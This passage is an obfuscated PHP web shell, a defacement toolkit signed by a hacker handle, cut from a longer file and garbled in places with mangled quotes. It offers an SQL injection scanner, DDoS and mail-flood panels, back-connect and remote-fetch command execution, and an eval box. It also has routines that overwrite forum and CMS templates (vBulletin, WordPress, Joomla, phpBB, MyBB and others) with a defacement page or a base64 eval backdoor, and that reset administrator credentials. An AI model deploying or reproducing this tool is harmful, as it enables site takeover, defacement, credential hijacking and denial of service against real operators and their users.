\155e\x6db\x65\x72 \x66\165\x6e\143\164\151o\156|\115i\x63\162o\163\x6f\146\164 \112ET \x44\141\x74\141\142a\x73e|\117\x44B\103 Mic\162o\x73\157\x66\164 \101\x63ces\x73 \x44\x72\151\166\x65r|M\151cr\157\x73o\146\164 \x4fL\x45 D\102 \x50ro\x76ide\162 \x66\x6f\x72 \123\121\114 \x53\x65\x72\x76er|\125\x6e\x63l\157\x73\145\x64 \161\165\157\164at\151o\156 m\x61\x72\x6b|\115icro\x73o\x66t OLE \x44\x42 Pr\x6fv\151de\162 \146\157\x72 Oracle|\x49\x6e\143\157r\x72e\143\x74 \x73\171\x6e\x74\x61x \156\x65\x61\162|\123\x51\x4c query f\141\x69\x6ce\144/”, ekV8gb3DG(str_replace(“=”, “=’”, $sites[2][$a])))) { echo str_replace(“=”, “=’”, $sites[2][$a]).” <== Yea\x68..\x56u\x6c\x6e\x65\x72\x61\x62\x6ce ! \n"; } else { echo str_replace("=", "='", $sites[2][$a])." <== No\164 V\x75\154n\145\162a\142le..\x73\x6f\x72\162\171! \n"; ob_flush(); flush(); sleep(1); } if($a > count($sites[2])-2) { echo “\114\145\x74\163..sc\141\x6e \157\164\x68\145r \160\x61ge.. \n”; break; } $a = $a+1; } $b = $b+100; } }

elseif($_POST['StartAttack']) { @set_time_limit(0); $url = $_POST['ipToAttack'];
$times = $_POST['times'];
$wait = $_POST['wait'];
echo “[+] \x73ta\162\164\151n\x67 \157\156 $url\n”; ddos($url, $times, $wait); } echo ““; if($_POST['editFileSubmit']) { echo ”

“; } echo “

<\x74\141b\x6c\145 \x77\151\144t\x68='100%'><\164r>

</\164\141\x62\x6c\x65></\x66\157r\155>

</\x74\144>
<\x74\x64 w\x69\144t\x68='30%' \150e\x69gh\x74=30>


<\x74\x61\x62le w\151\x64\164\x68='100%' h\x65\151\147ht='72' \142o\162\x64e\162='0' i\144='\x42ox'>

&\156bs\x70;</\164\x64>
<\x74d \x73t\x79\x6ce='\x62\141c\x6bgr\157\165\156d-\x63ol\x6f\162:#666;\x70\x61\144d\x69n\x67-\x6c\x65\146\164:10p\x78;'>E\x64\x69\164 Fi\x6c\145 </\164r><\x74r><\x74\x64 h\145\x69\147\x68\164='45' \x63\x6fl\163pa\x6e='2'></\164\144></\164\162>


<\164r>
<\x74d \x77i\144\164\x68='30%'>

<\x66or\x6d method='\x50OS\124'><\164\141b\154\x65 wi\x64t\150='100%' \150e\x69\x67\x68\164='72' \142o\162d\x65\x72='0' i\x64='\x42\x6f\170'>
<\164d \x77\151\x64th='4%' \x68\145\151ght='21' \163t\x79l\145='b\x61\x63k\x67\162o\x75\156\144-co\154\x6fr:".$kHFd4g91d."'>&\x6e\142s\x70;
<\164\x64 s\x74y\x6c\145='\x62\141c\153g\162o\165\x6e\x64-co\154or:#666;\160\141d\144\151\x6e\x67-\x6c\145ft:10\160\170;'>\x43\x68a\x6eg\145 \115\157de </\164d><\x74d \x68\145ig\x68t='45' \143ol\163\x70\x61n='2'>

</\164r></\164\x61\142\154e></\146\157\x72\x6d>



<\146\x6frm method='\x50\x4f\x53\x54'><\x74\141\x62l\145 \x77\151\x64t\150='100%' \150\x65ig\x68t='72' b\157\162\144\145\x72='0' \x69d='\x42\157\170'><\164\x72>
&\156\142\163p;</\164\144>

\167\147\145\164curl -\x6fg\x65\x74\154\171n\170 -s\157\165\162c\x65

</\163e\154\x65\x63\164>

</\164r></\164\141\x62\x6c\x65></\146\157\162m>

</\x74d>
<\x74d>

<\x66orm method='\120\x4f\x53\x54'><\x74\x72>
<\x74\x64 \x77\x69\144\164\150='4%' \150\145\x69\147h\x74='21' s\164y\154e='\x62\141\x63kg\x72ou\x6e\144-c\x6flo\x72:".$kHFd4g91d."'>&\x6eb\163\x70;</\x74\144>
<\x74d \x73t\171l\x65='\x62\141\143\153\x67\x72o\x75\x6e\144-\x63\157l\x6fr:#666;\x70\141\144\x64i\156\147-\x6cef\164:10\160x;'>B\151\x6e\144 C\x6f\156\x6ee\x63\164\151\157\x6e </\x74\144></\164\162>

<\164\144 he\151g\x68\x74='45' \x63\157lsp\x61\156='2'><\x73\x65\x6cec\x74 \143\154\x61\163s='i\156p\165\164z' size='1' name='\x75\x73\x65'>Pe\162lC

</\x74d></\x74ab\x6c\x65></\x66\x6f\162m>

</\164\144>
</\x74\x72>
<\x74\x72>


<\146\157\x72m method='P\117ST'><\164a\142\x6c\145 \x77\x69dth='100%' \x68\145i\147h\x74='72' b\157\x72\x64\145r='0' \151\x64='\102\x6f\x78'><\x74\162>
<\164\x64 w\151\x64\x74\150='4%' h\x65i\147h\x74='21' \163t\171\x6c\145='\x62\x61\x63\153\x67ro\165\156\x64-\143ol\x6f\162:".$kHFd4g91d."'>&n\142sp;</\164\144>
<\164\x64 s\x74\x79\x6c\x65='\x62\x61\x63\x6b\147r\x6f\165\156\144-c\x6f\154\x6f\x72:#666;\160\141d\144\151\x6eg-l\x65\146\x74:10p\170;'>C\107I \120\145r\154 </\164\144></\164\162><\x74\162><\x74\144 h\145ig\150\x74='45' \x63\x6fl\163\x70a\156='2'></\164\144></\x74\x72>

</\x74d><\x74d>

<\146o\162\155 method='\120O\123\124'>
<\x74\x64 \x77\151dt\150='4%' \150\145\x69\x67\x68\164='21' \x73\x74yl\145='\142a\143\x6b\x67r\x6fu\x6ed-col\x6f\162:".$kHFd4g91d."'>&nb\163\160;</\164\x64> Dire\143t\157\162y\x49\x6e\144e\170H\x65a\x64\145\x72N\141\x6de\x54\130T404\x52\145\141\x64meN\141\155e\x66o\x6f\164e\x72Na\155e

</\163\x65\x6c\145\143\x74>

</\x74\x64></\146\157\x72\x6d>

<\164\x64>

<\146\x6f\x72m method='\120\x4f\123\124'><\x74\141\x62\154\145 \167\151\144\164h='100%' he\x69\x67\150\x74='72' b\x6f\162\144\145\x72='0' id='\x42o\x78'><\x74\162>
<\164\x64 \167\x69\144\x74h='4%' \150\145igh\164='21' \163\164\x79\154\x65='b\x61c\153\x67\x72ou\156d-c\x6f\x6co\162:".$kHFd4g91d."'>&n\x62\163\160;</\164\x64>
<\164\x64 \x73t\x79\154\x65='\142a\143\x6bg\162o\x75n\144-colo\162:#666;\160\x61d\x64ing-\154e\146\164:10\x70\x78;'>\x42a\143\153 \x43o\156n\x65c\164i\x6f\x6e </\x74d></\x74\162><\164\x72><\x74\x64 \150\x65\151\147\x68\164='45' \x63\x6fl\163\160a\x6e='2'>

<\163\145\x6ce\x63\164 name='\165se'>\x50\145r\154C

</\x74\141\142\x6c\145></\146\x6f\x72\x6d>

</\x74\144>
</\164\162>



<\x74\x61\142\154\x65 \167i\x64th='100%' h\145\x69g\x68\x74='72' \x62\157\x72\x64er='0' \151\x64='Bo\x78'><\x74\x72>

</\x74r><\x74r><\164\x64 h\145\x69\147\150\164='45' \143\157\x6c\x73p\x61n='2'>

</\x74\144></\164\162></\164\x61\142\154\x65></\x66\x6f\162\x6d>


<\x74\144>

<\x74\141\x62\x6c\145 w\x69d\164\x68='100%' he\x69\x67h\164='72' \142o\162\x64\145r='0' \151\x64='B\157\170'><\x74\162>
<\164\144 \167id\164\x68='4%' \x68\145\151\147ht='21' st\x79\154\145='b\x61\x63\x6b\147ro\165\x6e\x64-col\157\x72:".$kHFd4g91d."'>&\x6e\142s\160;</\x74\x64>
<\x74\144 \163t\x79le='\x62\141\143k\147r\157un\144-\x63\x6f\x6co\x72:#666;\x70\x61d\x64in\x67-le\x66t:10\x70\x78;'>\x45v\141l \x43\157d\x65


<\164\x64 \150\145igh\x74='45' \x63\157\x6cs\x70\141n='2'>

</\164\x72></\x66\x6f\x72\155>

</\164\144>


<\146\157\162\x6d method='\x50\x4f\x53T'><\x74\141b\154\x65 wi\x64\x74\x68='100%' \x68e\151g\x68t='72' \x62o\162\x64\x65r='0' \151\x64='Bo\170'><\164\x72>
<\x74\x64 \x77\x69d\164\x68='4%' \x68e\151\147ht='21' \x73t\171le='\142ack\147\x72o\165\x6e\x64-\143ol\157r:".$kHFd4g91d."'>&\156\x62\x73\x70;</\164\144>
<\x74d s\164\x79\154\x65='\142\141\x63\x6b\x67\x72ou\156d-\143\157\154\x6fr:#666;\x70\141\144\x64\x69\156\x67-l\x65f\164:10px;'>Users & \x44om\141\151n\163 </\164\144><\164\162><\x74d he\151gh\x74='45' \143\x6fls\160\141n='2'>


</\164\144></\x74\x72></\x74\141\x62\154e>
</\x74\x64>
</\164r>
<\164\x72>
<\164\x64>

<\146\x6f\162m method='POST'><\x74\141\142l\x65 \x77\x69dt\150='100%' h\x65\151\147\150\x74='72' \x62\x6f\162de\162='0' \x69\x64='B\157\170'>
<\164\x64 w\x69dth='4%' h\x65i\147\150\x74='21' \x73t\x79l\x65='\142ack\x67r\157u\x6ed-\x63o\154\157r:".$kHFd4g91d."'>&\156\142s\x70;
<\164\144 s\164yl\145='\x62a\x63kg\162\157\165n\x64-colo\x72:#666;\160a\144\144\x69n\147-\x6c\145f\x74:10\x70\170;'>\x52\145ad\x69ng \106i\x6c\145\163 & Di\x72 \125\x73\x69\156g P\x48\120 B\165\x67\163 </\x74\x64><\x74\162>

</\164\162></\x74\141b\154\x65></\146\x6f\162m>


<\164\x64>

<\146\x6f\x72\155 method='\x50\117S\124'><\x74\141b\154\x65 \x77\x69\144\164h='100%' \150\x65i\x67\x68\x74='72' b\157\x72\x64\x65\x72='0' \x69\144='B\157x'>
&n\x62\x73\x70;

<\164d>


<\x74\x64 w\151\x64\164h='4%' h\x65i\x67\x68\164='21' st\171\154\145='b\141\x63kg\162o\165n\x64-\143\157\x6co\x72:".$kHFd4g91d."'>&nbs\x70;</\164\x64>
<\x74d \x73\164\x79le='\142\x61\x63\153\147\x72\x6fu\156d-\x63ol\x6f\162:#666;\160a\144di\156g-le\146t:10p\170;'>\x4d\145t\141\163\x70\x6c\157\x69t \103o\x6en\145\x63tio\156 </\x74\x64>

<\x74\x72><\x74\144 h\x65\x69\147\x68\x74='45' \x63ols\160a\156='2'>

</\x74\x61\x62\154e>

</\x74r>

<\164\144>

<\x74\141\142\154\145 w\x69\x64\164\150='100%' h\x65\x69\147h\x74='72' b\157r\144\x65r='0' \151\144='\x42ox'><\164\x72>
<\x74\144 \x77\x69\144\x74\150='4%' h\145\151ght='21' s\x74y\154e='\142ac\153g\162\x6fun\144-\x63\x6f\x6cor:".$kHFd4g91d."'>&nb\163\160;
<\164\x64 s\164\171\x6ce='\x62\141\143\x6b\147\x72\x6f\165n\144-co\154or:#666;p\141\x64\x64\x69\x6e\x67-\154e\146t:10\x70x;'>DDOS A\164t\141\143\x6be\162 </\164\144><\164\162><\164\144 \150\x65\x69\147h\x74='45' \x63o\x6csp\x61\x6e='2'>

</\x74d></\164\x72></\x74\x61\x62\x6c\x65></\146\157\162m>

</\x74\x64>
<\164\144>

<\146\x6f\x72\155 method='\x50OS\124'><\x74\x61b\x6c\145 \x77\x69\x64\164\150='100%' \x68\x65ig\150\x74='72' \x62o\x72d\x65\x72='0' \x69d='B\157\170'><\164\162>
<\x74\x64 w\x69\144t\x68='4%' h\x65\x69gh\x74='21' s\x74yl\145='b\141\143\153\x67\x72\157\165\156d-\x63\157\154o\162:".$kHFd4g91d."'>&\x6eb\x73p;

<\x74\x64 \x73\x74\x79le='\x62\x61c\x6b\147r\157\x75\156d-\x63ol\x6f\x72:#666;pa\x64\x64i\x6e\147-\x6ce\x66t:10p\x78;'>\120\157rt\x73 \x53\x63a\x6e\156e\x72 </\x74\x64>

<\164\x64 \x68e\x69g\150\x74='45' \x63o\x6cspan='2'></\x74\144>

</\x74ab\x6c\x65></\x66or\155>

</\x74\x64>

<\164r><\x74\144 h\145\151\147\150\164='45' c\x6f\154\x73\x70a\156='2'>


</\164d></\164r>
</\164d>
</\164r><\142r>


<\146o\x72m method='\x50\117\x53\124'><\x74\x72>
<\x74d \x77i\x64\x74h='4%' \150e\x69g\x68\x74='21' \163ty\x6ce='b\141c\153\x67\x72\x6fu\156\x64-\143\x6f\154o\x72:".$kHFd4g91d."'>&n\142\163\x70;
\x53\145\162v\145\x72 \123\150\x6frt\103\x75\x74 </\164\144></\x74\162><\164\162><\164d \x68\145\x69\147\150t='45' \143o\154s\x70a\156='2'></\x74\x64></\x74r></\164a\142l\145></\x66\157\x72\155>

</\x74d>


<\146\x6f\x72\155 method='\120\x4fST'><\164\x61\x62l\x65 \167\x69d\164\x68='100%' h\x65\x69\147\150\164='72' b\157\x72\x64e\x72='0' \x69\x64='Bo\170'><\x74\x72>
<\x74d \x77\x69\144\x74\150='4%' h\x65\x69g\150t='21' st\x79le='b\141c\153\x67ro\x75\156\x64-\x63\157lo\x72:".$kHFd4g91d."'>&\x6e\142\x73\x70;

F\141\163\164 Too\154\x73 </\x74\x64></\x74\x72>

<\164\x64 \x68\x65\x69\147h\x74='45' \143o\x6c\x73p\141\156='2'><\x62\162/><\142\162/></\164r></\164\x61\142l\x65>

<\x74\144 \x76\141\154\151\147n='T\117\120'>

<\x66o\162\x6d method='P\x4f\123T'><\164a\142\x6c\x65 \x77\x69\x64\x74\x68='100%' \x68\145\x69\x67h\x74='72' \142\x6fr\144e\x72='0' \x69d='\102\x6fx'><\x74\162>
<\x74\144 \167i\x64th='4%' \150e\x69\147ht='21' \163\164yl\x65='\142\141c\153\147r\x6f\x75\x6ed-\x63\157\154or:".$kHFd4g91d."'>&nb\x73p;
<\164d sty\x6c\145='\x62\x61c\x6bg\162\157\165nd-\143\157\154\x6fr:#666;\160\141\x64din\147-\x6c\x65\146\x74:10\160\x78;'>\123\121\x4c \x49\156\152ec\164\151\157\156 S\143\141nne\162</\x74d><\x74\x72>

</\x74d>

</\164\x61\x62\154\x65></\x66\x6f\x72\155>

</\x74\x64>
</\x74\162>
<\x74\162>




<\x66\x6f\x72m method='\120O\x53\124'><\164a\x62\x6c\145 \167\x69d\164\150='100%' \x68\x65i\147\150t='72' \142\157r\144\145\x72='0' \151\144='B\157x'>
<\164\x64 wid\x74\150='4%' \150e\151g\150t='21' \163\x74\x79l\145='\142a\143k\x67\162\157u\x6ed-\143\x6f\154or:".$kHFd4g91d."'>&\156\x62\163\x70;

\126\102\x75l\154\x65\164\151n\x57\x6f\162\x64\x50\162\x65s\x73\112\x6f\x6f\155\154\141\111\x50.B\x6fa\162\144\120\x48P\102BM\171B\102\x53\115F

</\x73\x65l\145c\164><\x62\162 />

\x48a\143k\x65d \102y \123\171R\151\101\156_3\x34\10713</\164\x64></\164\x72></\x74\141b\x6ce></\146or\x6d>




<\146o\x72\x6d method='P\117\x53\x54'><\x74a\142le w\x69\x64t\150='100%' h\x65i\147h\x74='72' \x62or\144\x65\x72='0' \151\x64='\102o\170'><\164\162>
<\164\144 \167\x69\144t\150='4%' hei\147\150\x74='21' \x73\164\171\x6c\145='\x62a\x63\x6b\x67\x72o\x75\156d-\x63\x6f\x6c\x6fr:".$kHFd4g91d."'>&\156\x62\163p;</\164\x64>
<\164\x64 \x73\x74\x79l\145='backgrou\x6e\144-\x63\x6fl\157r:#666;\160\141\144\144\x69\x6e\x67-\x6c\145\x66\164:10\160\170;'>Mai\x6c \123t\157\x72\x6d </\164d></\164r><\164r><\164\144 h\145i\147\x68\164='45' \143o\x6c\163\160\x61\156='2'>
<\164\x65\x78\x74\141\162\145a rows='6' co\154s='45' name='Comments' >\x41t\x74\x61c\153\145\162 M\x65ss\x61ge</\x74d></\164a\x62le>

</\x74r>

<\164d \166\x61\154\151\x67n='t\157\x70'>

<\x66or\155 method='\120\117\x53\x54'>
<\164\144 w\x69d\164\150='4%' h\145\151\147h\x74='21' \163\164\x79\x6c\145='b\141\x63\x6b\x67rou\156\144-\x63\x6flo\x72:".$kHFd4g91d."'>&\156\x62\163\x70;</\x74\x64>

<\164d w\x69\x64t\150='4%' \150\145i\x67\150\x74='21' s\x74\x79\x6c\145='\x62\x61\x63\153gr\x6f\165n\144-\x63\157lo\x72:".$kHFd4g91d."'>&\x6e\x62s\x70;</\164d>
<\164d \x73\x74\x79\154e='\142a\143kg\162\157\x75\156\x64-c\157\154o\x72:#666;\160\141dd\x69\x6eg-left:10p\170;'>U\160l\x6fad Fi\x6c\145\163 </\x74\x64></\164r><\164\162><\164d h\x65\151\x67\x68t='45' c\157\154sp\x61n='2'></\x74\144></\164r></\164\141\142le></\146or\155>

</\164d>
</\x74a\142\x6ce>
“; if($_POST['changeDirectory']) { $directory = $_POST['directory']; $directory = @str_replace(“\\\\”,” “,$directory); $directory = @str_replace(” “,”\\”,$directory); @chdir($directory); } if($_POST['getFile']) { $fileUrl = $_POST['fileUrl']; $getType = $_POST['getType']; Exe(“‘”.$getType.$fileUrl.”‘”); } oIP58gX9b(); }

if ($_GET['id']== ‘scriptsHack’ ) { echo ”


<\x74d \x63o\x6c\163p\141\x6e='2'><\164\145\170\164\x61\x72\145\x61 \143o\154s='153' rows='10'>“; if($_POST['UpdateIndex'] || $_POST['changeInfo'] ) { $host = $_POST['HOST']; $user = $_POST['USER']; $pass = $_POST['PASS']; $db = $_POST['DB']; $index = $_POST['INDEX']; $prefix = $_POST['PREFIX']; if (empty($_POST['HOST'])) $host = ’127.0.0.1′; $index=str_replace(“\’”,”‘”,$index); @mysql_connect($host,$user,$pass) or die( “[-] \x55\x6ea\142\x6c\x65 \124\117 \x43o\156ne\x63\164 \x44A\x54\x41\102\101S\x45 ! Username \x4fr \120\x61\163\x73\x77o\162d \111\x73 \x57r\157ng !!”); @mysql_select_db($db) or die (“[-] \x44\x61t\x61b\x61\x73\x65 Na\155e Is \127\162\157\156\147 !!”); if($_POST['UpdateIndex']) { if ($_POST['ScriptType'] == ‘vb’) { $iLc5dge8i = “{\${\x65\166a\154(\x62\x61\163\145\0664_\x64\x65\143od\x65(\’”; $iLc5dge8i .= base64_encode(“ec\150\x6f \”$index\”;”); $iLc5dge8i .= “\’))}}{\${\x65\x78i\x74()}}</\x74e\170\164\141r\x65\141>“; if($_POST['injectFAQ']) { $injectfaq = @mysql_query(“\125\x50\x44\x41\124E t\145\x6dp\154a\x74e \x53E\x54 \x74\x65mp\x6c\x61\x74e =’”.$iLc5dge8i.”‘ WH\105RE ti\x74\x6ce =’\x66a\x71′”); } else { $BnHa7g834 = mysql_query(“U\x50\104\101\x54E \x74e\155\x70\154\141\x74\x65 \x53E\x54 \x74\145m\x70\154ate =’”.$iLc5dge8i.”‘ \x57\110\105\x52\105 ti\x74\154\x65 =’\146\x6fru\155\x68\157\x6d\x65′”); if (!$BnHa7g834) { $MVoa8gCb_ = mysql_query(“\125\x50\104\101\x54E t\x65\x6d\160\154a\164e \123\x45\124 \164\145\x6dp\154a\x74\145 =’”.$iLc5dge8i.”‘ W\110\x45R\105 \164\x69\x74le =’\150\x65a\144\x65\162′”); } elseif (!$MVoa8gCb_) { $Xhba9gFiO = mysql_query(“\x55\x50D\x41\x54\x45 \164e\x6d\160\154\x61\x74\x65 \x53E\x54 t\x65\155p\x6ca\x74e =’”.$iLc5dge8i.”‘ \x57\x48ERE \164i\x74\154\x65 =’\x73\160a\x63er_\x6f\x70\x65\x6e’”); } elseif(!$Xhba9gFiO) { $VAXaagA2I = @mysql_query(“U\x50\104\101\124E \x74\145m\160\154\141t\145 SET tem\160\x6c\x61\164e =’”.$iLc5dge8i.”‘ \x57H\x45\122E \x74\x69\164\x6ce =’\146\x61\161′”); } } mysql_close(); if ($BnHa7g834 || $MVoa8gCb_ || $Xhba9gFiO || $VAXaagA2I || $injectfaq ) { update(); } else { echo “\125\x70\144a\164\151n\x67 \110a\163 \106ai\x6ced !”; } } else if ($_POST['ScriptType'] == ‘wp’) { $eZaddg7ml = $prefix.”\x70os\x74\163″ ; $BnHa7g834 = mysql_query(“UP\104AT\x45 $eZaddg7ml \x53E\x54 pos\x74_\164\x69\x74\154\145 =’”.$index.”‘ W\x48E\x52E I\x44 > 0 “); if(!$BnHa7g834) { $MVoa8gCb_ = mysql_query(“UP\104AT\x45 $eZaddg7ml \x53\105\x54 \160\157\163\x74_\x63ont\x65\156\164 =’”.$index.”‘ \127\110\105\x52\x45 \111\x44 > 0 “); } elseif(!$MVoa8gCb_) { $Xhba9gFiO = mysql_query(“\125P\104A\124\105 $eZaddg7ml \123\105\x54 \160o\163\x74_\x6e\141me =’”.$index.”‘ \x57\x48\105\122E ID > 0 “); } mysql_close(); if ($BnHa7g834 || $MVoa8gCb_ || $Xhba9gFiO) { update(); } else { echo “\125p\144\x61\164\151n\x67 \x48\x61\x73 \106\x61\151l\145d !”; } } else if ($_POST['ScriptType'] == ‘jos’) { $XdR8bg0Ii = $prefix.”\155e\x6e\165″ ; $ocO8cg_XF = $prefix.”m\x6f\x64\x75\x6ces” ; $BnHa7g834 = mysql_query(“U\120\x44AT\105 $XdR8bg0Ii S\105\124 name =’”.$index.”‘ \x57\110\105\122\x45 I\104 > 0 “); if(!$BnHa7g834) { $MVoa8gCb_ = mysql_query(“\x55\120\104\x41\x54\x45 $ocO8cg_XF SE\x54 \x74\151tle =’”.$index.”‘ \127HE\122\x45 I\x44 > 0 “); } mysql_close(); if ($BnHa7g834 || $MVoa8gCb_ || $Xhba9gFiO) { update(); } else { echo “U\x70\x64\141\164\151n\x67 \110\141\x73 \x46ai\154ed !”; } } else if ($_POST['ScriptType'] == ‘phpbb’) { $XFtb5g42r = $prefix.”\146\x6f\162\x75\x6ds”; $OzCb6grYg = $prefix.”\160\x6fs\x74\x73″; $BnHa7g834 = mysql_query(“\x55\x50D\101\x54\x45 $XFtb5g42r \123ET f\x6f\162\x75m_\x6e\x61\x6d\x65 =’.$index.’ \x57\110\x45\x52\x45 \x66\x6f\162\165m_\151\x64 > 0 “);
if(!$BnHa7g834) { $MVoa8gCb_ = mysql_query(“\125\120\104\x41T\105 $OzCb6grYg \x53E\124 \x70\157\x73t_s\165b\x6a\145\143t =’.$index.’ \127\110\105\x52\x45 \160\x6fs\x74_\151\x64 > 0 “); } mysql_close(); if ($BnHa7g834 || $MVoa8gCb_ || $Xhba9gFiO) { update(); } else { echo “\125pd\x61t\x69\x6eg \x48as \106\141\x69l\145d !”; } } else if ($_POST['ScriptType'] == ‘ipb’) { $ZUa87gEAG = $prefix.”c\x6f\155\x70\157\x6e\145n\x74s” ; $GCC88gD9X = $prefix.”\x66\x6f\162\165\x6d\x73″ ; $UkT89g0qs = $prefix.”p\157\163\164\x73″ ; $BnHa7g834 = mysql_query(“\125P\x44\101\x54\105 $ZUa87gEAG \x53E\x54 \143\157\x6d_\164it\154e =’”.$index.”‘ \x57H\x45\122\x45 com_\x69d > 0″); if(!$BnHa7g834) { $MVoa8gCb_ = mysql_query(“UP\104A\124E $GCC88gD9X \123E\124 name =’”.$index.”‘ \127\110\105\x52E \151d > 0″); } if(!$MVoa8gCb_) { $Xhba9gFiO = mysql_query(“\125\x50\x44ATE $UkT89g0qs \x53E\124 p\x6f\x73\164 =’”.$JRHdg7niZ.”‘ \x57H\105\x52E \160\x69d <10") or die("\x43\x61\156'\164 Up\144\x61\x74\145 \124e\155p\x6c\141\x74\x65s !!"); } mysql_close(); if ($BnHa7g834 || $MVoa8gCb_ || $Xhba9gFiO) { update(); } else { echo "\125\160d\141\164\151n\x67 \110a\x73 \106\x61\x69l\x65\144 !"; } } else if ($_POST['ScriptType'] == 'smf') { $lffdeg_2O = $prefix."\142\x6fa\162d\163" ; { $BnHa7g834 = mysql_query("U\120\x44\101T\x45 $lffdeg_2O \x53\105\x54 d\145\x73\143\162\151\x70tion ='.$index.' \x57\x48E\122E I\x44_\102\x4f\101R\104 > 0″); } if(!$BnHa7g834) { $MVoa8gCb_ = mysql_query(“UPD\x41\124E $lffdeg_2O SET name =’.$index.’ W\110\x45\x52E \x49D_B\117\x41\x52\104 > 0″); } mysql_close(); if ($BnHa7g834 || $MVoa8gCb_) { update(); } else { echo “Up\144\141t\151\156g \110\x61s \x46ai\x6c\145d !”; } } else if ($_POST['ScriptType'] == ‘mybb’) { $dXfa0gHt3 = $prefix.”t\x65m\160\154a\164\145s”; $BnHa7g834 = mysql_query(” update $dXfa0gHt3 \x73et \164e\155\x70\x6c\x61t\x65=’”.$index.”‘ \x77\150\145\162\x65 ti\164\154\145=’index’ “); if ($BnHa7g834) { update(); } else { echo “Up\144a\x74i\x6e\x67 \x48\141\163 Fa\151l\x65\144 !”; } mysql_close(); } } elseif($_POST['changeInfo']) { $adminID = $_POST['adminID']; $userName = $_POST['userName']; $password = $_POST['password']; if($_POST['ScriptType'] == ‘vb’) {
$password = md5($password); $Njle5gzaM = @mysql_query(“\125\120D\101\124\105 user \123\x45\124 username = ‘”.$userName.”‘ , password = ‘”.$password.”‘ W\110\x45\x52\105 \x75\163\x65\162id = “.$adminID.”"); if($Njle5gzaM) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == ‘wp’) {
$password = crypt($password); $Njle5gzaM = @mysql_query(“U\120\104ATE \167\x70_\165s\145r\163 S\x45\124 \165\163\x65\162_\x6c\157\147\151\x6e = ‘”.$userName.”‘ , \165\x73\145\x72_\160\x61ss = ‘”.$password.”‘ \127\110\105\122\x45 \111\104 = “.$adminID.”"); if($Njle5gzaM) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == ‘jos’) {
$password = crypt($password); $Njle5gzaM = @mysql_query(“\125\120\104\101T\x45 jo\x73_u\x73\145\x72s SE\124 username =’”.$userName.”‘ , password = ‘”.$password.”‘ \127\x48\x45\122E I\104 = “.$adminID.”"); if($Njle5gzaM) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == ‘phpbb’) {
$password = md5($password); $Njle5gzaM = @mysql_query(“\125\120\x44\101\124E \160\150\x70\x62\x62_\x75\x73\145\162\163 \123E\124 username =’”.$userName.”‘ , \x75\x73er_p\x61s\163wo\x72d = ‘”.$password.”‘ \x57\x48\105\122\x45 us\145\x72_\151\144 = “.$adminID.”"); if($Njle5gzaM) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == ‘ibf’) {
$password = md5($password); $Njle5gzaM = @mysql_query(“\x55PD\101\x54E ib\x66_m\x65\x6d\x62\x65\x72\163 SE\x54 name =’”.$userName.”‘ , \155\145\x6d\142\145r_\154\157\x67\x69\156_\x6b\145\171 = ‘”.$password.”‘ W\x48\x45\x52\105 \x69d = “.$adminID.”"); if($Njle5gzaM) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == ‘smf’) {
$password = md5($password); $Njle5gzaM = @mysql_query(“\125PD\x41T\x45 s\155f_\155\x65mb\x65\162\163 \x53\105T \155\x65m\142e\x72\116a\x6d\145 =’”.$userName.”‘ , passwd = ‘”.$password.”‘ \127\110\105R\x45 \111\104_\x4dEM\x42\x45\122 = “.$adminID.”"); if($Njle5gzaM) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == ‘mybb’) {
$password = md5($password); $Njle5gzaM = @mysql_query(“U\120\x44\x41\x54E m\171b\142_\x75\x73\145\x72s S\105T username =’”.$userName.”‘ , password = ‘”.$password.”‘ \127H\x45\122E uid = “.$adminID.”"); if($Njle5gzaM) {update();} else {mysql_error();} } }
} else if($_POST['Decrypt']) { DecryptConfig(); } echo “</\164ex\164ar\145a></\164d>

<\x66\157rm method='\120\117S\124'>
<\164\141\142\154e w\x69d\164h='100%' he\x69g\x68t='72' bo\x72\x64\145\x72='0' \151\144='B\157\x78'>
<\164r>
<\x74\x64 w\x69\144t\x68='4%' \x68\145\x69\x67\150t='21' \163\x74\171l\x65='\x62a\143\153\x67\162\x6fu\156\x64-\x63\157l\x6f\162:".$kHFd4g91d."'>&\156\142\x73p;
\x53\143ri\x70\x74\163 \x48\141\143\x6bin\147 </\x74\144>
</\x74r>
<\x74r>

<\x73\x65l\145\143\x74 name ='ScriptType' >V\102ul\x6c\x65\x74\151\x6eW\157\162\x64\x50\x72\x65\x73\163Jo\x6f\155l\x61\111\x50.B\x6f\141\x72\144P\x48\x50\x42\x42\x4d\x79BB\123\115\x46

</\x73el\145ct>

<\x73\x79>\x49\x6e\x6a\x65c\164 \x53\150ell \111\156 \x46AQ.p\x68\160 ?
[ \x56\x42 \117n\154\x79 ]</\163y>
\x50u\164 Y\157\165\162 \111\x6e\144\145x H\145\162\x65 !


</\164r>
</\164\141b\x6ce>
<\x74\144 \x77\151d\164\x68='50%' \x76\141\x6cign='\164\x6fp'>
<\164\141\142\x6ce w\x69d\164h='100%' \150\145\x69\147\x68\164='72' \142o\162\144\145r='0' \x69\144='\x42\157x'>
<\164\x72>
<\x74d \167i\x64t\150='4%' \150\145\x69\x67h\x74='21' s\x74\x79\x6c\x65='\142a\143\153g\162ou\x6e\144-c\157\x6c\x6f\162:".$kHFd4g91d."'>&\156\x62\163p;</\x74\x64>
\104\x65\x63r\171\x70\164in\x67 \x43o\x6e\x66i\147s </\164\x64>
</\164\162>
<\x74\x72>
<\x74d \150e\151\147\150\x74='45' co\x6c\163\x70\x61\156='2'>
\120le\x61s\145 \120\165t \x43o\x6efi\x67 \111n \124h\145 \123h\x65\154\x6c \104\151rec\164ory W\151t\150 \x54\150\145 Nam\145 [ DecryptConfig.\x70\150p ]</\x74\x64>

</\164a\142l\145>
<\x74\141\x62\154\x65 wi\x64\164\x68='100%' h\145\151\x67\150t='72' \x62order='0' id='Bo\170'>
<\x74\x72>
<\x74\144 \x77\151d\x74\x68='4%' he\x69\x67\150\x74='21' s\164\x79l\145='b\141ck\x67r\x6fu\x6e\144-\143o\154o\162:".$kHFd4g91d."'>&\x6e\142\163p;

</\164ab\154\x65>

</\x74\x64>
</\164r></\164\141\142\154\x65>“; oIP58gX9b(); }

